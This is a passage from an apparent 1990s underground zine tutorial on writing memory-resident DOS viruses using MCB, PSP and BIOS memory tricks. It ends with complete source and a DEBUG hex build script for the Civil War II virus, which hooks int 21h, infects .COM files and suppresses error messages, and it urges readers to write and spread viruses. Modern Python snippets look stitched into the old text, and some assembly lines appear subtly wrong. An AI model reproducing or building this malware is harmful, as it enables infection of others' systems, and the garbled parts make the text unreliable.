allocation are int 21 functions 4ah (Set Memory Block Size) and 48h (Allocate Memory Block). The first thing that your virus needs to do is to request the maximum amount of memory available. 
This is done with the int 21h function 4ah. The strategy is to request an inordinate amount of memory so that the function will fail, but send us back the actual amount of memory available. The code for this is: mov ah,4ah mov bx,0ffffh int 21h If you ask for 0ffffh, you are requesting 65535 paragraphs of memory, which is an insane amount. The result will be the actual maximum available memory returned in BX. Just to make you aware that there are different techniques out there that virus writers use, another way of getting the same information loaded into BX is to access the MCB directly and simply read it. When a program is loaded into memory, it is assigned all available memory. This value appears in the MCB at offset 3. We can therefore access the MCB directly by decrementing a segment register to the address of the MCB and accessing the information directly. Code for this operation: mov ax,ds dec ax mov ds,ax ;We now have the MCB off of DS. mov bx,word ptr ds:[03] The MCB size, or total available memory is now in BX. Armed with this information, we can then subtract the size of our virus plus 1, to account for the MCB, from the maximum available memory and execute the function again. This changes the amount of available memory for the program. For example: mov ax,4ah sub bx,(endOfVirus-beginOfVirus+15)/16+1 int 21h When calculating the amount of memory to allocate, keep in mind that you are working in paragraphs. Therefore the virus size needs to be divided by 16. The virus size is calculated by subtracting the offset for the end of the virus from the beginning and adding 15. The addition of 15 acts as a way of rounding up. Care must be taken that enough memory is allocated so that the transfer of the virus into memory doesn't overflow the amount requested. If you would happen to move one extra byte into memory that is not accounted for, you run the risk of overwriting the "M" in the next MCB and crashing the system. 
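If the paragraph arithmetic above feels abstract, here is a minimal sketch of it in Python rather than assembly. It only illustrates the rounding: a byte count is turned into whole 16-byte paragraphs by adding 15 before dividing, and one more paragraph is set aside for the MCB header. The function names and the sample sizes are my own, made up for the illustration.

```python
PARAGRAPH = 16  # bytes in one real-mode paragraph


def paragraphs_needed(size_in_bytes: int) -> int:
    """Round a byte count up to whole paragraphs: (size + 15) / 16."""
    return (size_in_bytes + PARAGRAPH - 1) // PARAGRAPH


def paragraphs_with_header(size_in_bytes: int) -> int:
    """Same as above, plus one paragraph for the MCB that precedes a block."""
    return paragraphs_needed(size_in_bytes) + 1


if __name__ == "__main__":
    # Hypothetical sizes, chosen to show what happens at a paragraph boundary.
    for size in (1, 16, 17, 600):
        print(size, paragraphs_needed(size), paragraphs_with_header(size))
```

Notice that 16 bytes fit in one paragraph while 17 bytes need two. Without the +15, a plain division would round down and the block would come up short.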
The code for allocating memory for the virus: mov ax,48h mov bx,(endOfVirus-beginOfVirus+15)/16 int 21h Now that memory has been allocated for the virus, the MCB needs to be changed and the virus moved into memory. Upon successful operation of function 48h, the segment address of the allocated memory block is returned in AX. Remember that the MCB is located directly before its memory block. To access the MCB we need to decrement the segment address in AX and move the address into the extra segment register, or ES. Lets look at the code: dec ax mov es,ax Now that the MCB can be accessed off of ES, take a look at the MCB structure and lets see what we need to change. Firstly, we need to change the status of the MCB to "Z", of the end of the chain. Whether you want to use "Z" or its hex equivalent (5ah) is up to you. The next common practice is to change the PSP segment of the owner at offset 1 to show that the block is owned by DOS. This is accomplished by moving an 8 into the location. If you see a zero in this location, it means that the block is free. You could actually set the segment address to point to the virus code, but typically, as a survival tool, the owner is set to DOS, 8. The code for this is: mov byte ptr es:[0],'Z' mov word ptr es:[8],8 The only thing that is left to do is to copy the virus into memory. This is very easy. All that you need to do is to increment AX and move the memory block address back into ES. Load the data segment register (DS) with the code segment register (CS). Clear the destination index register with an XOR. Set the length of the virus in CX and perform a "repeat moves bytes" instruction. Enough narrative. what does the code look like? For example: inc ax mov es,ax push cs pop ds xor di,di lea si,startOfVirus mov cx,endOfVirus-startOfVirus rep movsb This can be done a multitude of ways. This is just an example. Keep in mind that no delta offsets are used in this sample code. You have to adapt it to your own style. 
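For reference, the MCB header fields mentioned in this section can be decoded from a raw 16-byte dump. The following is a rough Python sketch for reading such a dump, for example one saved from a debugger. It assumes only the layout already described: the status byte at offset 0, the owner PSP segment at offset 1 and the block size in paragraphs at offset 3. The names MCB and parse_mcb and the sample bytes are invented for the illustration.

```python
import struct
from typing import NamedTuple


class MCB(NamedTuple):
    kind: str        # 'M' = more blocks follow, 'Z' = last block in the chain
    owner: int       # owner PSP segment (0 = free, 8 = DOS)
    paragraphs: int  # size of the block that follows, in 16-byte paragraphs


def parse_mcb(header: bytes) -> MCB:
    """Decode the first five bytes of an MCB header (little-endian)."""
    if len(header) < 5:
        raise ValueError("need at least 5 bytes of MCB header")
    kind, owner, paragraphs = struct.unpack_from("<BHH", header, 0)
    if kind not in (0x4D, 0x5A):  # 'M' or 'Z'
        raise ValueError("not an MCB: bad status byte")
    return MCB(chr(kind), owner, paragraphs)


if __name__ == "__main__":
    # Hypothetical dump: status 'Z', owner 0008h, size 0040h paragraphs.
    sample = bytes([0x5A, 0x08, 0x00, 0x40, 0x00]) + bytes(11)
    mcb = parse_mcb(sample)
    print(mcb, mcb.paragraphs * 16, "bytes")
```

Reading a dump this way is also how you would spot a block at the end of the chain that claims to be owned by DOS.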
Another way that you might see the MCB technique utilized is with complete direct manipulation. There are many ways to implement this technique of manipulating MCB's. One of the direct techniques that you can use involves manipulating data in the PSP, MCB, and BIOS. Take a look at the code below. sub word ptr cs:[2],40h ;----------------------------- mov ax,cs dec ax mov ds,ax sub word ptr ds:[3],40h ;----------------------------- mov ax,40h mov ds,ax sub word ptr ds:[13h],1 mov ax,word ptr ds:[13h] shl ax,6 mov es,ax push cs pop ds xor di,di lea si,start mov cx,end-start rep movsb This is actually a very neat and compact residency module. Try to digest it in sections. The first section manipulates the top of memory section of the PSP. When a program is loaded for execution, remember that the PSP is located directly before the program from 00 to 100h (CS). The initial subtracting of 40h (1KB) from the PSP, lowers the top of memory data in the PSP. I hope that you recognize the next section of code. This is the section that accesses the MCB and subtracts 40h (1KB) from the size of the MCB. Take a quick glance at offset 3 on my lovely MCB chart. The last item that needs to be changed is the BIOS. Within the BIOS data area at 413h and 414h, is the amount of base memory that can be accessed. This needs to be shrunk by 40h as well to reserve that much space for your code and to ensure that it is not overwritten. In the above code, location 413h is accessed by using segment 40[0]h and offset 13h. You will see either addressed utilized, it is simply a matter of preference. The value that is subtracted from the 413h location of the BIOS data area is the amount of K bytes that you need, in this case, 1 KB. Now that the BIOS has been adjusted, we then need to find the address of the free segment to use. This is done by multiplying the adjusted BIOS base memory amount by 64. The SHL, or (S)hift (L)ogical (L)eft, instruction may be used for this operation. 
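To see why a multiplication by 64 turns a kilobyte count into a segment address, here is the arithmetic as a small Python sketch. One KB is 1024 bytes, which is 64 paragraphs of 16 bytes, and a segment value is simply a paragraph number. The function name and the sample values of 640 and 639 KB are only assumptions for the illustration.

```python
PARAGRAPHS_PER_KB = 1024 // 16  # 64 paragraphs in one kilobyte


def kb_to_segment(base_memory_kb: int) -> int:
    """Convert a base-memory size in KB to the segment at that boundary."""
    return base_memory_kb << 6  # shifting left by 6 is multiplying by 64


if __name__ == "__main__":
    for kb in (640, 639):  # hypothetical values before and after giving up 1 KB
        print(kb, "KB ->", format(kb_to_segment(kb), "04X") + "h")
```

The same numbers show why 40h keeps turning up in the code above: 40h paragraphs is exactly 1 KB.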
On processors above the 8088/8086, the SHL instruction can be used with a constant up to 31. In the above code, the constant is 6. If you are working with an 8088/8086, you will need to load CL with the constant and issue an SHL ax,cl. After the multiplication is completed, the value is moved into ES for addressing in the string movement, which should be familiar to you.

As with the Fact virus, I am also including a virus which demonstrates the MCB manipulation technique. The virus that I am including is Dark Helmet's Civil War II V1.1. Take a look at the code, which can be found in the appendix. There are no destructive routines in his virus. Don't believe some of that shit that you have seen in AV program descriptions of his virus. If you don't trust me, just look at the code; it's harmless. Probably the only thing that you won't recognize in his code is the int 24h handler. I haven't gone over this, but int 24h is the critical error handler. When you hook this interrupt, you are intercepting critical error messages before they can appear on the screen. This is a technique that we use to avoid alerting the lamer that an error has occurred in the infection process.

Both the Fact and Civil War II virii can be assembled with TASM. If you are not reading this tutorial from the 3rd edition of the Codebreakers Zine, cut the code from this tutorial and save it in a file named CivilWar(or Fact).asm. Otherwise this ASM file can be found in the Cdbkutl folder. Issue the commands:

    A:\tasm civilwar(or Fact).asm
    A:\tlink /t civilwar(or Fact).obj

*TASM Hint - If you have errors in your code and would like to save them for future reference, redirect the output to a file:

    A:\tasm NameofVirus.asm>NameofVirus.txt

The errors that occur during assembly will be saved in a TXT file. I find this helpful when I am debugging my code. As you can see, I prefer to execute the virus on the A: drive (floppy). You should also exit Windows and perform all this in DOS.
Follow the same instructions as with the Fact virus. Include in the same directory a "Fly" test COM file. Check the size of the Fly program before and after execution of the program and before and after the virus is resident. It is always advisable to check the code of a virus before compiling, just to make sure that there are no destructive routines in the code. Although there are many ways for a virus to destroy your files and hard drive, the most common method is to use int 13h to write shit all over the drive. If you see int 13h functions 03h, 05h, 09h, get out!

Ethics

Hmmm. Now that you are entering the world of advanced virus techniques, you might be faced with the decision of whether or not to write destructive routines in your code. I am not going to talk about this too much because I might get into trouble. Officially, I will say that the Codebreakers do not condone destructive code. We are more interested in system manipulation and programming techniques. However, many AV personages view all virus code as destructive by nature of what it is. So you might think that your virus is non-destructive, but, in their eyes, it's still malicious code. Also, if you have something to prove and are pissed off at the world, who is going to be scared of a gun that doesn't shoot or a crook who doesn't steal? Enough said.

----------------------
Conclusion
----------------------

The purpose of this primer is to aid the advanced beginner in understanding the basics of virus residency techniques. My secondary aim is to add to the general programming knowledge of the assembly aspirant. In future tutorials, I will be covering more advanced residency techniques such as manipulation of memory above 1 MB, and with that, programming in protected mode. What do they have out now, the 686? And we are still teaching 8086? Don't worry. The 8086 instruction set still offers many features that we haven't covered and will still be used into the future for virus programming.
One piece of advice that I want to give the programmer is that you need to know the basics before you can go on to the advanced topics. As you can see in this tutorial, the actual virus infection techniques were not covered. You should already know them from the first two tutorials. I don't want to have to repeat the basics too many times.

Also, keep in mind that this tutorial is divided into separate modules. In order to write a memory resident virus, it is imperative that you divide your code into separate modules corresponding to the individual tasks that you want the virus to perform. For example, if you look at the Fact virus and you want to add self-recognition capabilities to it, you will need to include a self-recognition module. The hooking of the interrupts and the resident enabling processes are all modules within the virus. Take a look at the virus creation engines. If you want to add an extra capability to a virus, the creation lab tacks on another module for that routine. Most of your virii will use the same techniques. If you find a routine that works for you, keep it.

As I have said previously in the tutorial, I only wanted to introduce you to the basics of writing resident code. In the next tutorial, I will be introducing EXE file type infecting, along with more residency techniques that were not covered in this tutorial. My advice to you in writing your first resident virus is to start out on paper and visualize all of the steps that your virus must take in order to function in the pre- and post-residency stages. Study other virii. Take a look at the techniques other virus writers have used in their code. Figure out what works best and use it. Good luck!
Horny Toad Appendix 1 - Civil War II Virus V1.1 by Dark Helmet ------------------------------------------------------------ .Radix 16 Civil_War Segment Model small Assume cs:Civil_War, ds:Civil_War, es:Civil_War org 100h len equ offset last - begin virus_len equ len / 16d dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection ; marker begin: Call virus ; make call to ; push IP on stack virus: pop bp ; get IP from stack. sub bp,109h ;adjust IP. restore_host: mov di,0100h ; recover beginning lea si,ds:[carrier_begin+bp] ; of carrier program. mov cx,06h rep movsb check_resident: mov ah,0a0h ; check if virus int 21h ; already installed. cmp ax,0001h je end_virus adjust_memory: mov ax,cs ;start of Memory dec ax ;Control Block mov ds,ax cmp byte ptr ds:[0000],5a ;check if last ;block jne abort ;if not last block ;end mov ax,ds:[0003] ;decrease memory sub ax,40 ;by 1kbyte lenght mov ds:[0003],ax sub word ptr ds:[0012],40h install_virus: mov bx,ax ; es point to start mov ax,es ;virus in memory add ax,bx mov es,ax mov cx,len ;cx =length virus mov ax,ds ;restore ds inc ax mov ds,ax lea si,ds:[begin+bp] ;point to start virus lea di,es:0100 ;point to destination rep movsb ;copy virus in ;memory mov [virus_segment+bp],es ;store start virus ;in memory mov ax,cs ;restore es mov es,ax hook_vector: cli ; no interups mov ax,3521h ; revector int 21 int 21h mov ds,[virus_segment+bp] mov old_21h-6h,bx mov old_21h+2-6h,es mov dx,offset main_virus - 6h mov ax,2521h int 21h sti abort: mov ax,cs mov ds,ax mov es,ax end_virus: mov bx,0100h ; jump to begin jmp bx ; host file ;*********************************************************** main_virus: pushf cmp ah,0a0h ;check virus call jne new_21h ;no virus call mov ax,0001h ;ax = id popf ;return id iret new_21h: push ds ; save registers push es push di push si push ax push bx push cx push dx check_open: cmp ah,3dh je chk_com check_exec: cmp ax,04b00h ; exec function? 
je chk_com continu: pop dx ; restore registers pop cx pop bx pop ax pop si pop di pop es pop ds popf jmp dword ptr cs:[old_21h-6] chk_com: mov cs:[name_seg-6],ds mov cs:[name_off-6],dx cld ;check extension mov di,dx ;for COM push ds pop es mov al,'.' ;search extension repne scasb ;check for 'COM" cmp word ptr es:[di],'OC' ;check 'CO' jne continu cmp word ptr es:[di+2],'M' ;check 'M' jne continu call set_int24h call set_atribuut open_file: mov ds,cs:[name_seg-6] mov dx,cs:[name_off-6] mov ax,3D02h ; open file call do_int21h jc close_file push cs pop ds mov [handle-6],ax mov bx,ax call get_date check_infect: push cs pop ds mov bx,[handle-6] ; read first 6 bytes mov ah,3fh mov cx,06h lea dx,[carrier_begin-6] call do_int21h mov al, byte ptr [carrier_begin-6]+3 ; check initials mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' cmp ax,[initials-6] je save_date ; if equal already ; infect get_lenght: mov ax,4200h ; file pointer begin call move_pointer mov ax,4202h ; file pointer end call move_pointer sub ax,03h ; ax = filelenght mov [lenght_file-6],ax call write_jmp call write_virus save_date: push cs pop ds mov bx,[handle-6] mov dx,[date-6] mov cx,[time-6] mov ax,5701h call do_int21h close_file: mov bx,[handle-6] mov ah,03eh ; close file call do_int21h mov dx,cs:[old_24h-6] ; restore int24h mov ds,cs:[old_24h+2-6] mov ax,2524h call do_int21h jmp continu new_24h: mov al,3 iret ;----------------------------------------------------------- ; PROCEDURES ;----------------------------------------------------------- move_pointer: push cs pop ds mov bx,[handle-6] xor cx,cx xor dx,dx call do_int21h ret do_int21h: pushf call dword ptr cs:[old_21h-6] ret write_jmp: push cs pop ds mov ax,4200h call move_pointer mov ah,40h mov cx,01h lea dx,[jump-6] call do_int21h mov ah,40h mov cx,02h lea dx,[lenght_file-6] call do_int21h mov ah,40h mov cx,02h lea dx,[initials-6] call do_int21h ret write_virus: push cs pop ds mov ax,4202h call move_pointer mov ah,40 mov cx,len mov dx,100 call 
do_int21h ret get_date: mov ax,5700h call do_int21h push cs pop ds mov [date-6],dx mov [time-6],cx ret set_int24h: mov ax,3524h call do_int21h mov cs:[old_24h-6],bx mov cs:[old_24h+2-6],es mov dx,offset new_24h-6 push cs pop ds mov ax,2524h call do_int21h ret set_atribuut: mov ax,4300h ; get atribuut mov ds,cs:[name_seg-6] mov dx,cs:[name_off-6] call do_int21h and cl,0feh ; set atribuut mov ax,4301h call do_int21h ret ;----------------------------------------------------------- ; DATA ;----------------------------------------------------------- old_21h dw 00h,00h old_24h dw 00h,00h carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet',00h jump db 0e9h name_seg dw ? name_off dw ? virus_segment dw ? lenght_file dw ? handle dw ? date dw ? time dw ? initials dw 4844h last db 090h Civil_war ends end dummy Debug Script for Civil War II virus N CIVIL.COM E 0100 E9 03 00 44 48 00 E8 00 00 5D 81 ED 09 01 BF 00 E 0110 01 8D B6 FF 02 B9 06 00 F3 A4 B4 A0 CD 21 3D 01 E 0120 00 74 5E 8C C8 48 8E D8 80 3E 00 00 5A 75 4C A1 E 0130 03 00 2D 40 00 A3 03 00 83 2E 12 00 40 8B D8 8C E 0140 C0 03 C3 8E C0 B9 57 02 8C D8 40 8E D8 8D B6 06 E 0150 01 BF 00 01 F3 A4 3E 8C 86 51 03 8C C8 8E C0 FA E 0160 B8 21 35 CD 21 3E 8E 9E 51 03 89 1E F1 02 8C 06 E 0170 F3 02 BA 80 01 B8 21 25 CD 21 FB 8C C8 8E D8 8E E 0180 C0 BB 00 01 FF E3 9C 80 FC A0 75 05 B8 01 00 9D E 0190 CF 1E 06 57 56 50 53 51 52 80 FC 3D 74 13 3D 00 E 01A0 4B 74 0E 5A 59 5B 58 5E 5F 07 1F 9D 2E FF 2E F1 E 01B0 02 2E 8C 1E 47 03 2E 89 16 49 03 FC 8B FA 1E 07 E 01C0 B0 2E F2 AE 26 81 3D 43 4F 75 D8 26 83 7D 02 4D E 01D0 75 D1 E8 EC 00 E8 05 01 2E 8E 1E 47 03 2E 8B 16 E 01E0 49 03 B8 02 3D E8 83 00 72 54 0E 1F A3 4F 03 8B E 01F0 D8 E8 BC 00 0E 1F 8B 1E 4F 03 B4 3F B9 06 00 BA E 0200 F9 02 E8 66 00 A0 FC 02 8A 26 FD 02 3B 06 55 03 E 0210 74 18 B8 00 42 E8 45 00 B8 02 42 E8 3F 00 2D 03 E 0220 00 A3 4D 03 E8 4B 00 E8 72 00 0E 1F 8B 1E 4F 03 E 0230 8B 16 51 03 8B 0E 53 03 B8 
01 57 E8 2D 00 8B 1E E 0240 4F 03 B4 3E E8 24 00 2E 8B 16 F5 02 2E 8E 1E F7 E 0250 02 B8 24 25 E8 14 00 E9 49 FF B0 03 CF 0E 1F 8B E 0260 1E 4F 03 33 C9 33 D2 E8 01 00 C3 9C 2E FF 1E F1 E 0270 02 C3 0E 1F B8 00 42 E8 E3 FF B4 40 B9 01 00 BA E 0280 46 03 E8 E6 FF B4 40 B9 02 00 BA 4D 03 E8 DB FF E 0290 B4 40 B9 02 00 BA 55 03 E8 D0 FF C3 0E 1F B8 02 E 02A0 42 E8 B9 FF B4 40 B9 57 02 BA 00 01 E8 BC FF C3 E 02B0 B8 00 57 E8 B5 FF 0E 1F 89 16 51 03 89 0E 53 03 E 02C0 C3 B8 24 35 E8 A4 FF 2E 89 1E F5 02 2E 8C 06 F7 E 02D0 02 BA 54 02 0E 1F B8 24 25 E8 8F FF C3 B8 00 43 E 02E0 2E 8E 1E 47 03 2E 8B 16 49 03 E8 7E FF 80 E1 FE E 02F0 B8 01 43 E8 75 FF C3 00 00 00 00 00 00 00 00 90 E 0300 CD 20 44 48 00 43 69 76 69 6C 20 57 61 72 20 49 E 0310 49 20 76 31 2E 31 2C 20 28 63 29 20 30 36 2F 30 E 0320 33 2F 31 39 39 32 20 54 72 69 64 65 6E 74 2F 44 E 0330 61 72 6B 20 48 65 6C 6D 65 74 2C 20 54 68 65 20 E 0340 4E 65 74 68 65 72 6C 61 6E 64 73 00 E9 00 00 00 E 0350 00 00 00 00 00 00 00 00 00 00 00 44 48 90 RCX 025E W Q Appendix 2 - The PSP (from Ralf Brown's Interrupt List) Format of Program Segment Prefix (PSP): Offset Size Description (Table 1032) 00h 2 BYTEs INT 20 instruction for CP/M CALL 0 program termination the CDh 20h here is often used as a signature for a valid PSP 02h WORD segment of first byte beyond memory allocated to program 04h BYTE (DOS) unused filler (OS/2) count of fake DOS version returns 05h BYTE CP/M CALL 5 service request (FAR CALL to absolute 000C0h) BUG: (DOS 2+ DEBUG) PSPs created by DEBUG point at 000BEh 06h WORD CP/M compatibility--size of first segment for .COM files 08h 2 BYTEs remainder of FAR JMP at 05h 0Ah DWORD stored INT 22 termination address 0Eh DWORD stored INT 23 control-Break handler address 12h DWORD DOS 1.1+ stored INT 24 critical error handler address 16h WORD segment of parent PSP 18h 20 BYTEs DOS 2+ Job File Table, one byte per file handle, FFh = closed 2Ch WORD DOS 2+ segment of environment for process (see #1033) 2Eh DWORD DOS 2+ 
process's SS:SP on entry to last INT 21 call 32h WORD DOS 3+ number of entries in JFT (default 20) 34h DWORD DOS 3+ pointer to JFT (default PSP:0018h) 38h DWORD DOS 3+ pointer to previous PSP (default FFFFFFFFh in 3.x) used by SHARE in DOS 3.3 3Ch BYTE DOS 4+ (DBCS) interim console flag (see AX=6301h) Novell DOS 7 DBCS interim flag as set with AX=6301h (possibly also used by Far East MS-DOS 3.2-3.3) 3Dh BYTE (APPEND) TrueName flag (see INT 2F/AX=B711h) 3Eh BYTE (Novell NetWare) flag: next byte initialized if CEh (OS/2) capabilities flag 3Fh BYTE (Novell NetWare) Novell task number if previous byte is CEh 40h 2 BYTEs DOS 5+ version to return on INT 21/AH=30h 42h WORD (MSWindows3) selector of next PSP (PDB) in linked list Windows keeps a linked list of Windows programs only 44h WORD (MSWindows3) "PDB_Partition" 46h WORD (MSWindows3) "PDB_NextPDB" 48h BYTE (MSWindows3) bit 0 set if non-Windows application (WINOLDAP) 49h BYTE unused by DOS versions <= 6.00 4Ch WORD (MSWindows3) "PDB_EntryStack" 4Eh 2 BYTEs unused by DOS versions <= 6.00 50h 3 BYTEs DOS 2+ service request (INT 21/RETF instructions) 53h 2 BYTEs unused in DOS versions <= 6.00 55h 7 BYTEs unused in DOS versions <= 6.00; can be used to make first FCB into an extended FCB 5Ch 16 BYTEs first default FCB, filled in from first commandline argument overwrites second FCB if opened 6Ch 16 BYTEs second default FCB, filled in from second commandline argument overwrites beginning of commandline if opened 7Ch 4 BYTEs unused 80h 128 BYTEs commandline / default DTA command tail is BYTE for length of tail, N BYTEs for the tail, followed by a BYTE containing 0Dh